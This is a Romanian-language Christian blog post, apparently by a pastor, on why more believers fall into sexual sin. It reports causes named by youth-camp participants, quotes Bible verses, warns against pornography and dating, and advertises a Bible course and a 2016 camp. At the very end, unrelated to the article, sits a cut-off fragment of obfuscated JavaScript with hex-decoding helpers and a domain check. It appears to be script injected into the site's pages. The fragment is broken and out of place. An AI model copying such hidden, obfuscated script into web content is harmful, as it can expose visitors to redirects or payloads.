De ce a crescut numărul creștinilor care cad în păcatul desfrânării?

După ce am încheiat predarea cursului “Administrarea conținutului media” la Școala Internațională de Misiune, am mers la tabăra în corturi organizată de tinerii mișcării “Generația Curată” din cadrul Bisericii Buna Vestirea pe care o păstoresc. Ei studiază acum cursul biblic inductiv “Într-o zi mă voi căsători” și am mers să le predau lecția a doua, al cărei subiect este relația sexuală.

Tabăra Generația Curată

Soția mea a predat în ziua anterioară lecția despre deosebirile care sunt puse de Dumnezeu între bărbați și femei și care trebuie cunoscute, ca să poată cineva înțelege planul lui Dumnezeu pentru relația sexuală. În lecția pe care am predat-o am discutat mai întâi despre planul lui Dumnezeu în crearea relației sexuale, apoi am vorbit despre lucrurile care sunt oprite de Dumnezeu în această arie a vieții și, la urmă, am discutat instrucțiunile pe care le-a lăsat Dumnezeu pentru soț și soție și, care, fiind urmate, le vor aduce bucurie și împlinire în relația lor fizică.

Cauzele de cădere în păcatul desfrânării menționate de participanții la tabără

La încheiere le-am spus tinerilor despre pericolul curviei și faptul că în ultima vreme a crescut considerabil numărul creștinilor care au căzut în păcatul desfrânării. Am dorit să știu opinia lor cu privire la cauza creșterii numărului celor căzuți și am aflat următoarele lucruri pe care doresc să le împărtășesc în acest articol:

1. Cei căzuți s-au lăsat ademeniți de reclamele cu elemente sexuale. Un tânăr a spus că mulți colegi de ai lui caută site-uri pentru a privi online filme artistice. Filmele în sine nu sunt neapărat rele, dar acele site-uri abundă cu bannere și reclame porno sau sexuale. Ei se lasă atrași “pentru puțin timp” de acele reclame, ca apoi să nu mai poate scăpa de ele și o sfârșesc prin căderea de la credință.

2. O tânără a spus că multe fete au căzut în păcatul desfânării după ce au acceptat să stea la întâlniri. Au auzit și ele de la alți “creștini mai moderni”, care învață că nu este rău să stai la întâlniri și că “dacă nu stai la întâlnire, nu ai cum să te cunoști cu persoana după care vrei să mergi în căsătorie”. Prin acceptarea întâlnirilor au lăsat să le fie aprinse poftele și au căzut în păcatul desfrânării. Găsesc să menționez aici că numărul fetelor căzute este mult superior băieților. Vă invit să priviți emisiunea Adevărul despre Adevăr, la care am discutat din perspectiva Bibliei subiectul mersului și statului la întâlniri.

3. Un alt motiv al creșterii numărului căderii creștinilor în păcatul adulterului, care a fost menționat, sunt pildele rele date de unii slujitori și lideri creștini. Tinerii îi cred, îi urmează și sunt gata să ia pildă în toate de la ei. Atunci când văd că liderii lor sunt doborâți de imoralitate sau dau de înțeles că ar putea să se lase doborâți și că au alte standarde decât cele lăsate de Hristos, ucenicii lor cedează și nu mai stau tari în neprihănire. Domnul Isus a spus pentru astfel de lideri următoarele cuvinte:

Dar pentru oricine va face să păcătuiască pe unul din aceşti micuţi, care cred în Mine, ar fi mai de folos să i se atârne de gât o piatră mare de moară şi să fie înecat în adâncul mării. Vai de lume, din pricina prilejurilor de păcătuire! Fiindcă nu se poate să nu vină prilejuri de păcătuire; dar vai de omul acela prin care vine prilejul de păcătuire! (Matei 18:6-7)

Cum să te păzești de cădere în păcatul desfrânării?

Să învățăm să fugim de curvie, cum este scris:

Voia lui Dumnezeu este sfinţirea voastră: să vă feriţi de curvie; fiecare din voi să ştie să-şi stăpânească vasul în sfinţenie şi cinste, nu în aprinderea poftei, ca Neamurile care nu cunosc pe Dumnezeu. (1 Tesaloniceni 4:3-5)

Să ne ferim de orice lucru care aprinde pofta sexuală și care ne poate duce la adulter, la masturbare sau care pune pe om sub presiunea apăsătoare a dorinței sexuale neîmplinite. Să nu mai privim niciun fel de imagini porno, filme porno, videoclipuri porno și orice fel de glume care provoacă omul la rău și infidelitate. Nu mai stați cu cei care în căutarea de bancuri noi ascultă sau spun tot felul de bancuri cu prostii. Când cineva începe să le spună, vorbește-le despre pericolul lor și dacă nu vor să asculte și să înceteze, ferește-te de acea companie, căci ei trăiesc în aprinderea poftelor ca neamurile, iar noi nu așa am învățat de la Domnul nostru. Unii din cei care trăiesc în aprinderea poftelor se înșală, crezând că, făcând o dată în an spovedania la preot sau primind un canon de pocăință, vor fi curățiți de toate păcatele și nu le pasă de cuvintele lui Dumnezeu care spune astfel:

Nu ştiţi că cei nedrepţi nu vor moşteni Împărăţia lui Dumnezeu? Nu vă înşelaţi în privinţa aceasta: nici curvarii, nici închinătorii la idoli, nici preacurvarii, nici malahii, nici sodomiţii, nici hoţii, nici cei lacomi, nici beţivii, nici defăimătorii, nici hrăpăreţii nu vor moşteni Împărăţia lui Dumnezeu. (1 Corinteni 6:9-10)

Să știe bine și creștinii care au căzut în păcatul defrânării că dacă nu se pocăiesc și nu o rup categoric cu păcatul lor, nu vor moșteni Împărăția lui Dumnezeu nicidecum.

Iar tu, drag cititor, fugi de orice lucru, oameni și companie care îți trezesc poftele sexuale. Veghează zi și noapte ca să trăiești în neprihănire și în toate rugăciunile, inclusiv în rugăciunea de seară, roagă-te să te păzească Dumnezeu de orice cădere și același lucru cere pentru toți sfinții pe care îi cunoști și mai ales pentru cei care au căzut în păcatul desfrânării. Este bine să ai și o carte de rugăciuni în acest sens, dar când spun aceasta nu mă refer la o carte de rugăciuni scrise de cineva pe care să le înveți pe dinafară și să le spui totdeauna. Când spun să ai o carte de rugăciuni, mă refer la un caiet sau carnet, în care să scrii toate nevoile tale de rugăciune și numele persoanelor concrete pentru care să te rogi și, astfel, să-ți organizezi bine viața de rugăciune. Veghează totdeauna și în rugăciune pentru căsătorie, indiferent dacă ești căsătorit sau nu.

Dacă dorești să cunoști tot planul lui Dumnezeu, îți recomand să faci rost de cursul de studiu biblic inductiv “Sexualitatea din perspectiva Bibliei” de Kay Arthur. Dacă cunoști suficient de bine limba engleză, ca să-l poți studia astfel, te invit la tabăra English for a New Life 2016, care se va desfășura în perioada 12-22 iulie 2016 în localitatea Coșnița, raionul Dubăsari, la tabăra “Prietenia”.

Dacă acest articol te-a făcut să te gândești la alte lucruri importante pe care vrei să le împărtășești cu cititorii și cu autorul, te invit să le scrii la comentarii.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "moldovacrestina.md"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e